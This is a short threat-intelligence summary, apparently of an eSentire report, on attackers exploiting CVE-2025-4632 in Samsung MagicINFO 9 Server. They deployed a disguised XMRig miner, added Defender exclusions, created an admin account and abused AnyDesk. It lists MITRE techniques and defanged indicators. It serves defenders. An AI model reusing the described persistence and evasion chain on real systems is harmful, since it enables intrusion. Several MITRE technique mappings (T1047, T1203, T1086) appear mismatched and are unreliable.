In mid-May 2025, eSentire’s Threat Response Unit detected active exploitation of a critical vulnerability (CVE-2025-4632) in Samsung MagicINFO 9 Server, allowing remote code execution and unauthorized access. The attackers deployed a disguised XMRig cryptominer and abused AnyDesk for persistence and remote control, bypassing security measures through automated scripts and defender exclusions. #CVE20254632 #SamsungMagicINFO #XMRig #AnyDesk
Keypoints
- Exploitation of CVE-2025-4632 in Samsung MagicINFO 9 Server enabled unauthenticated remote code execution with system privileges.
- Attackers automated commands to create persistence, disable security measures, and deploy AnyDesk remote management tool for remote control.
- A variant of the XMRig Monero cryptominer was deployed under the name “smi2.exe” using PowerShell and batch scripts with multiple fallback mechanisms.
- The attackers created privileged local user accounts, added Microsoft Defender exclusions, and used legitimate Windows utilities (certutil, curl) for payload delivery.
- XMRig was configured for stealthy mining with multiple mining pool endpoints and autosave enabled, aiming to evade detection and maintain persistence.
- Use of AnyDesk was extensively configured to enable advanced remote access features, supporting ongoing attacker control while bypassing trust-based security.
- eSentire’s 24/7 SOC isolated affected hosts and provided remediation recommendations, emphasizing patching, monitoring, and restricting remote administration tools.
MITRE Techniques
- [T1203] Exploitation for Initial Access – The attackers exploited CVE-2025-4632 in Samsung MagicINFO 9 Server to execute arbitrary commands (“…exploitation of a critical vulnerability…allows unauthenticated attackers to execute arbitrary commands…”).
- [T1136] Create Account – Creation of a privileged local user “samsungmid” with administrator and remote desktop privileges (“User Account Creation: The script created a new local user account “samsungmid” with administrative privileges…”).
- [T1059] Command and Scripting Interpreter – Use of PowerShell and batch scripts to download and execute cryptomining malware and configure persistence (“Utilized both PowerShell and batch scripts…”).
- [T1086] PowerShell – Execution of multi-stage PowerShell commands to disable security and deploy payloads (“The script added Defender exclusions… executed AnyDesk…”).
- [T1112] Modify Registry – Added directories to Microsoft Defender exclusion lists to evade detection (“The attacker added the %TEMP% and %MAGICINFOPREMIUMHOME% directories to Microsoft Defender’s exclusion lists…”).
- [T1047] Windows Management Instrumentation – Use of legitimate Windows utilities like certutil and curl for downloading payloads (“…employed multiple fallback mechanisms, including PowerShell, certutil, and curl…”).
- [T1021] Remote Services – Abuse of AnyDesk remote desktop tool for persistent remote access (“…executed AnyDesk, retrieved the installation ID, and configured a new profile with extensive capabilities…”).
Indicators of Compromise
- [IP Addresses] Attack infrastructure – 157.230.106[.]100, 173.249.48[.]227, 185.213.26[.]27 used for cryptominer payload delivery and mining pools.
- [File Names] Cryptominer and scripts – smi2.exe (XMRig miner), win.ps1 (PowerShell downloader), win.bat (batch downloader and executor).
- [Accounts] Privileged user – Local user account “samsungmid” with administrative and remote desktop privileges created by attacker scripts.
- [Domains] Command and control – crmmr[.]icc[.]me used as alternative download source for malicious scripts and miner payloads.
Read more: https://www.esentire.com/blog/when-samsungs-magic-turns-tragic-a-tale-of-unauthorized-mining